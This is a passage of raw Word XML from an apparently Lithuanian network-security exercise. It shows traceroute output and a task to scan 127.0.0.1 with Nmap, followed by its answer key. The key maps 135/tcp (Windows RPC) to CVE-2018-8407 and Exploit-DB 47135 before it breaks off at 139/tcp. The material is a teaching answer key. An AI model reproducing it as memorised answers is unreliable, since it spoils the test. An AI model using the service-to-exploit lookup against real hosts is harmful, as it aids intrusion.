                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>72-125-189-128.static.zebra.lt [72.125.189.128]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A93396B" w14:textId="018F7719"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4</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>27 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>27 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>27 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>google1.teo.lt [212.59.12.158]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1793881D" w14:textId="4A2CC42D"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5</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>22 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>23 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>22 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>108.170.228.74</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615DC511" w14:textId="7ACAB13B" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>29 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>28 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>28 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>216.239.40.43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53391EE1" w14:textId="10D93A10" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>27 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>28 ms</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>27 ms</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>mil02s06-in-f4.1e100.net [172.217.16.4]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5162886F" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C18FD57" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Trace complete.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F93AF1D" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACFA74A" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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6 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽPILDYKITE PATEIKTĄ LENTELĘ NAUDODAMI programinę įrangą „NMAP“ ir IP adresą 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472ACED5" w14:textId="3F205DC7" w:rsidR="00CB38C9" w:rsidRPr="005A5C28" w:rsidRDefault="7AF1C1F0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidR="008B0B0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/ LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1145"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1764"/>
        <w:gridCol w:w="1764"/>
        <w:gridCol w:w="1917"/>
        <w:gridCol w:w="1843"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="15FA3AC9" w14:textId="77777777" w:rsidTr="564132E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="756B03E9" w14:textId="77777777" w:rsidR="00DC08D2" w:rsidRPr="005A5C28" w:rsidRDefault="559FEB62" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2581FE4F" w14:textId="77777777" w:rsidR="00DC08D2" w:rsidRPr="005A5C28" w:rsidRDefault="559FEB62" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Serviso prieigos Nr. (port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0705E1B6" w14:textId="77777777" w:rsidR="00DC08D2" w:rsidRPr="005A5C28" w:rsidRDefault="559FEB62" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Serviso prieigos pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07B0C1C3" w14:textId="77777777" w:rsidR="00DC08D2" w:rsidRPr="005A5C28" w:rsidRDefault="559FEB62" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Serviso prieigos versija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="967" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="230603A0" w14:textId="77777777" w:rsidR="00DC08D2" w:rsidRPr="005A5C28" w:rsidRDefault="559FEB62" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVE numeris (-iai)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38C5C3ED" w14:textId="77777777" w:rsidR="00DC08D2" w:rsidRPr="005A5C28" w:rsidRDefault="559FEB62" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pažeidžiamumo nr. iš duomenų bazės</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2493452C" w14:textId="77777777" w:rsidTr="564132E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BADE2C6" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0378143F" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="87"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18E190C9" w14:textId="74EC77DE" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>135/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62CE4F9F" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>msrpc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="207C341B" w14:textId="655E040D" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>epmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57E7B56A" w14:textId="42DCD532" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="967" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F2799E4" w14:textId="278941A9" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId248">
              <w:r w:rsidR="0C940C5D" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>CVE-2018-8407</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D47BFBB" w14:textId="7B775F2B" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="1DC0E201" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>EDB-ID: 47135</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="46955F30" w14:textId="77777777" w:rsidTr="564132E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40D17377" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0378143F" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="87"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E4764D6" w14:textId="7251E662" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>139/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53F43FF4" w14:textId="4B002946" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C466827" w14:textId="603C3D04" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
